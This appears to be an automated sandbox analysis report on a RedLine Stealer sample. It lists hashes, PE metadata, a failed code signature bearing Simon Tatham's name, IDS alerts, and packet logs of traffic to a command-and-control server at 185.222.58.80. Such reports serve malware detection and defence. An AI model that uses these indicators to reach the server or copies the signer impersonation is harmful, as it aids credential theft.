                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.851586551804549
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:PZNfhfaj9O.exe
                                                                              File size:706'568 bytes
                                                                              MD5:01d452e81b85a3d399a247852f2f5004
                                                                              SHA1:b1b5bb7edf69875726ea1c627fb0bbef6215143a
                                                                              SHA256:88fd2273dba726f8e93082eef548564c84ee1f3be9f69a7d02ef9a3ed7f8ea18
                                                                              SHA512:d1f62c8a067f9d2a241cc4604883e41aa9860fd09719ba2827dd0f2de9920411e62b57b9ba7a1e5184736c473ba4d621e31a194224a513de66a2879131c8f9bb
                                                                              SSDEEP:12288:QPSg4dwyerVbCx3YNAguNN9WSrLuWXSAdVPOgOFHSLWB0io0CJohPCAOkR:2Sg4WrVbCx3YNhuNN9tW/A7OgOkQtC0V
                                                                              TLSH:C2E4018133FD5F82DD798BFA29A0A04043F17A1AB965E7994EC261DF25B1F108F60E17
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.................0..x............... ........@.. ....................................@................................
                                                                              Icon Hash:62ceac86b2968ea2
                                                                              Entrypoint:0x4a96f6
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0xDCB7B960 [Tue May 6 02:54:24 2087 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Signature Valid:false
                                                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                              Error Number:-2146869232
                                                                              Not Before, Not After
                                                                              • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                              Subject Chain
                                                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                              Version:3
                                                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                              Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa96a3 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x146c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa9200 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa5ba4 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa76fc | 0xa7800 | 10fb85b55aed087cc4dab6b697999ebd | False | 0.9052355410447761 | data | 7.85886818157661 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xaa000 | 0x146c | 0x1600 | b74ab49baff4824a8040924214c673be | False | 0.3155184659090909 | data | 5.058440075640901 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xac000 | 0xc | 0x200 | 751d4b05cbddd335ecefa58545b7423b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xaa130 | 0xda8 | Device independent bitmap graphic, 26 x 64 x 32, image size 3328 | | | 0.2823226544622426
RT_GROUP_ICON | 0xaaed8 | 0x14 | data | | | 1.1
RT_VERSION | 0xaaeec | 0x394 | OpenPGP Secret Key | | | 0.42139737991266374
RT_MANIFEST | 0xab280 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T21:02:18.069928+0200 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.4 | 49737 | 185.222.58.80 | 55615 | TCP
2024-10-13T21:02:18.471203+0200 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 185.222.58.80 | 55615 | 192.168.2.4 | 49737 | TCP
2024-10-13T21:02:23.674747+0200 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.4 | 49737 | 185.222.58.80 | 55615 | TCP
2024-10-13T21:02:24.121653+0200 | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 185.222.58.80 | 55615 | 192.168.2.4 | 49737 | TCP
2024-10-13T21:02:27.747604+0200 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.4 | 49741 | 185.222.58.80 | 55615 | TCP
2024-10-13T21:02:28.413704+0200 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.4 | 49742 | 185.222.58.80 | 55615 | TCP
2024-10-13T21:02:33.500680+0200 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 185.222.58.80 | 55615 | 192.168.2.4 | 49742 | TCP
2024-10-13T21:02:33.726327+0200 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.4 | 49742 | 185.222.58.80 | 55615 | TCP
2024-10-13T21:02:37.152967+0200 | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 185.222.58.80 | 55615 | 192.168.2.4 | 49742 | TCP
2024-10-13T21:02:37.560860+0200 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.4 | 49748 | 185.222.58.80 | 55615 | TCP
2024-10-13T21:02:39.127691+0200 | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 1 | 192.168.2.4 | 49749 | 185.222.58.80 | 55615 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Oct 13, 2024 21:02:27.753359079 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.755713940 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.755764008 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.755775928 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.755790949 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.755817890 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.755844116 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.755875111 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756469011 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756495953 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756544113 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756567001 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756571054 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756597996 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756607056 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756624937 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756642103 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756658077 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756675005 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756680965 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756701946 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756730080 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756738901 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756752014 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756756067 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756764889 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756802082 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756802082 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756829023 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756855011 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756875038 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756880999 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756894112 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756927967 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756930113 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.756954908 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756980896 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.756993055 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757009029 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757024050 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757028103 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757055044 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757071972 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757080078 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757111073 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757111073 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757123947 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757158041 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757158995 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757185936 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757232904 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757234097 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757258892 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757285118 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757311106 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757332087 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757335901 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757358074 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757386923 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757388115 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757414103 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757420063 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757437944 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757441044 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757464886 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757467031 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757486105 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757508039 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757514954 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757540941 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757566929 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757587910 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757606030 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757642031 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757673979 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757688046 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757715940 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757718086 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757781982 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757807970 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757836103 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757838964 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757858992 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757865906 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757891893 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757891893 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757911921 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757932901 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.757939100 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757965088 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.757992029 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758016109 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758017063 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758040905 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758043051 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758069038 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758069992 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758100033 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758119106 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758122921 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758150101 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758177996 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758198977 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758204937 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758229971 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758233070 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758256912 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.758258104 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758274078 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.758300066 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760591984 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760618925 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760653019 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760669947 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760674953 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760696888 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760721922 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760751009 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760770082 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760776043 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760802984 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760828972 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760833979 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760849953 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760869026 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760874987 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760901928 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760927916 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.760931969 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760957003 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.760998011 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761163950 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761190891 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761221886 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761234045 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761250019 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761272907 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761296988 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761307955 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761322975 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761348963 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761348963 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761363983 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761375904 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.761399984 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.761426926 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.762432098 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.762523890 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.762551069 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.762578964 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.762602091 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.762629986 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.762811899 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.762865067 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763196945 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763245106 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763251066 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763274908 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763294935 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763302088 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763328075 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763329029 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763360023 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763375044 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763375044 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763420105 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763447046 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763473988 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763477087 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763499975 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763516903 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763525963 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763545036 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763564110 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763576031 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763580084 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763603926 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763626099 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763629913 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763653040 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763655901 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763679028 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763683081 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763699055 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763710022 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.763732910 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.763761044 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.768140078 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.768177986 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.768232107 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.768244028 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.768254995 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.768280029 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.768291950 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.768304110 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.768326044 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.768341064 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771595955 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771610022 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771621943 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771644115 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771655083 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771666050 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771677017 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771677017 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771687984 CEST5561549741185.222.58.80192.168.2.4
